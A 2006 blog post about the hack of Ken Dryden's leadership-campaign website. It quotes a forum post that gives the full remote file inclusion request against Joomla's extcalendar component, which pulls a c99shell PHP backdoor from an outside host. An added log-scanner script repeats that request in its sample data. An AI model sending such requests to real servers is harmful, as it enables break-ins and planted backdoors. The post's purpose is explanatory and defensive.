www.SteveJanke.com
Angry in the Great White North
Taking sloppy liberal thinking and tearing it a new one -- but always with a touch of class.




September 26, 2006

Ken Dryden's website hacked

Posted by Steve Janke of the Blogging Tories at 09:48 PM

Ken Dryden's website is down for the count. Still offline at the time of writing, it was felled by a hacker named TamTurk. But before the conspiracy theories start flying, TamTurk does not work for any other Liberal leadership campaign. Ken Dryden was just unlucky.

It's been a tough day for the administrators of Ken Dryden's website:

An Internet hacker took over leadership hopeful Ken Dryden's website Tuesday.

The erstwhile hockey great's smiling visage and campaign pitch disappeared, replaced by a triumphal message: "Hacked by TamTurk. We are Turk."

That was followed by gibberish.

Lise Jolicoeur, spokeswoman for Dryden's campaign, said the hacker took over the site during the wee hours of the morning Tuesday.

Jolicoeur said no one has any idea who TamTurk is, but she's inclined to think it's just a prank - not deliberate sabotage by a rival leadership campaign.

That no one knows is strange, because TamTurk has been a busy boy.

First, check out what Ken Dryden's website looked like after the attack, but before it was taken down.

The text in the picture is some sort of Turkish proverb or saying about a "genuine push" and "helping", but I'm having trouble translating a couple of words.

The rest of the text is either TamTurk's signatures or words that mean something to the hacker community.

Why Dryden? Just dumb luck. Here is the list of attacks known to have been perpetrated by TamTurk today:

DIGITAL ATTACKS ARCHIVE

  • 09/26/2006: http://fuelspace.com
  • 09/26/2006: http://www.ottawachallenge.ca
  • 09/26/2006: http://www.kendryden.ca
  • 09/26/2006: http://www.lantmeeters.com
  • 09/26/2006: http://www.branchitude.com
  • 09/26/2006: http://www.kapelle-op-den-bos.net
  • 09/26/2006: http://www.drivesafe.com
  • 09/26/2006: http://spinetime16.com
  • 09/26/2006: http://cage8.com
  • 09/26/2006: http://michaelfordphotography.com
  • 09/26/2006: http://mebuildingdreams.com
  • 09/26/2006: http://gwac.ca
  • 09/26/2006: http://fairsolutions.com
  • 09/26/2006: http://hemantrao.com
  • 09/26/2006: http://rebecca.no
  • 09/26/2006: http://newcitycompound.com
  • 09/26/2006: http://beachviewretreat.com
  • 09/26/2006: http://byondbeads.com
  • 09/26/2006: http://bluebettausa.com
  • 09/26/2006: http://betterbettas.com

How was it done?

Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

We got hacked twice last night. We are pretty sure the little fcuks used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes... everything is pretty fcuked. We fixed it, but they left yet another little PHP shell (c99shell) hidden deep down... and the whole thing started again. Particularly embarrassing for our clients, as the site got defaced pretty badly with some Islam/Terror stuff...

We went through all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed through:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:

.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a

Also, this php file did not have any defined( '_VALID_MOS' ) line...

We checked out other potentially vulnerable scripts, such as the upload facilities of Docman and ZOOm... but both have their upload facilities disabled in the front-end, and the files seem secure...

Any opinions?

ns

So this is not an attack by another leadership campaign. If the pattern reported above holds for Dryden's site, it is a remote file inclusion hole in the extcalendar component, used to fetch a PHP backdoor (c99shell) from another server and run it, at the hands of a hacker who gets around.
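The request quoted in the forum post is a textbook remote file inclusion: the attacker hands the script a CONFIG_EXT[LANGUAGES_DIR] value that is a URL rather than a directory, and, judging by the parameter name and the remote c99shell.txt it points at, the script feeds that value into an include() which PHP then fetches over the network. The poster found it by reading the logs. The scanner below automates that search; it is an added example written for this page, not code from the forum post, from Joomla or from extcalendar. The access-log lines it runs on are constructed for the example (IPs from documentation ranges; the attack line reproduces the request quoted above), and the `SHELL_PARAMS` names and the confidence rules are my assumptions about what separates an include attempt from an ordinary URL-valued parameter such as a redirect target.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format; only the fields the scanner uses are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# URL wrappers that PHP's include()/require() will fetch over the network when
# allow_url_fopen (and, from PHP 5.2 on, allow_url_include) is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")

# Query parameters c99shell itself reads once it is running; both appear in the
# request quoted above (act=ls lists the directory named in d=).  Assumed set.
SHELL_PARAMS = {"act", "d"}


def classify_request(target):
    """Decode one request target and return a list of findings, one per query
    parameter whose value is a remote URL.  Each finding is a dict with the
    decoded parameter name, the remote URL/host and a confidence rating."""
    parts = urlsplit(target)
    # parse_qsl percent-decodes names as well as values, so the key
    # CONFIG_EXT%5BLANGUAGES_DIR%5D comes back as CONFIG_EXT[LANGUAGES_DIR].
    params = parse_qsl(parts.query, keep_blank_values=True)
    names = {name for name, _ in params}
    findings = []
    for name, value in params:
        if not value.lower().startswith(REMOTE_SCHEMES):
            continue
        # Two traits (assumed heuristics) separate an include attempt from an
        # ordinary URL-valued parameter:
        #  - a trailing "?" so that whatever the script appends to the value
        #    (e.g. "/english.php") becomes a query string for the attacker's
        #    host instead of breaking the fetch;
        #  - the shell's own control parameters riding along in the same request.
        remote = urlsplit(value)
        strong = value.endswith("?") or bool(names & SHELL_PARAMS)
        findings.append({
            "path": parts.path,
            "param": name,
            "remote_host": remote.hostname,
            "remote_url": value,
            "confidence": "high" if strong else "low",
        })
    return findings


def scan_log(lines):
    """Run classify_request over access-log lines; returns the findings tagged
    with client IP, timestamp and status, high-confidence ones first."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for f in classify_request(m.group("target")):
            f.update(ip=m.group("ip"), time=m.group("time"), status=m.group("status"))
            results.append(f)
    results.sort(key=lambda f: f["confidence"] != "high")  # stable: keeps log order within a tier
    return results


# Constructed sample log: two ordinary requests (one carrying a legitimate URL
# parameter), an ftp:// probe, and the exact request from the forum post.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Sep/2006:02:13:44 -0400] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8456 "-" "Mozilla/5.0"
203.0.113.5 - - [26/Sep/2006:02:14:02 -0400] "GET /index.php?option=com_user&return=http%3A%2F%2Fwww.kendryden.ca%2F HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
198.51.100.77 - - [26/Sep/2006:03:40:55 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=ftp%3A%2F%2F198.51.100.77%2Fshell.txt%3F HTTP/1.1" 200 1203 "-" "libwww-perl/5.805"
198.51.100.77 - - [26/Sep/2006:03:41:09 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=http%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a HTTP/1.1" 200 23811 "-" "Mozilla/4.0"
""".splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['confidence']:4} {f['ip']:15} {f['time']} {f['path']} "
              f"{f['param']} -> {f['remote_url']}")
```

Run as a script it prints the findings for the embedded sample; feeding `scan_log` an open access-log file works the same way. A high-confidence hit on a request that returned 200 means the server most likely fetched and executed the shell source, so the next step is to look for new or recently modified .php files under the web root, which is exactly the second c99shell the poster found "hidden deep down". Note that the benign redirect parameter is still reported, only at low confidence: a URL in a query string is a weak signal on its own, and the two extra traits are what make the extcalendar request stand out.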








Comments:

Looks like Dryden's webteam wasn't staying up to date. He actually uses a Joomla CMS, instead of the Mambo referenced in your example.

This issue was first identified in April and discussed extensively in July along with resolutions. On top of that Joomla issued a Security Maintenance release on the 29th of August that addressed this vulnerability.

"Joomla! 1.0.11 [ Sunbow ] is now available as of Monday 28th August 2006 24:00 UTC for download here. and is being designated a critical security Release.

All existing Joomla! users must upgrade to this version, due to several High Level vulnerabilities that affect all previous versions of Joomla!"

Posted by: BBS at September 26, 2006 11:42 PM

I'm really beginning to hate joomla.

Posted by: the bear at September 27, 2006 07:48 AM

hate those hackers.

Posted by: real estate online at September 28, 2006 04:55 PM

how can we protect our web sites from hacking?

Posted by: wedding dresses at September 28, 2006 04:57 PM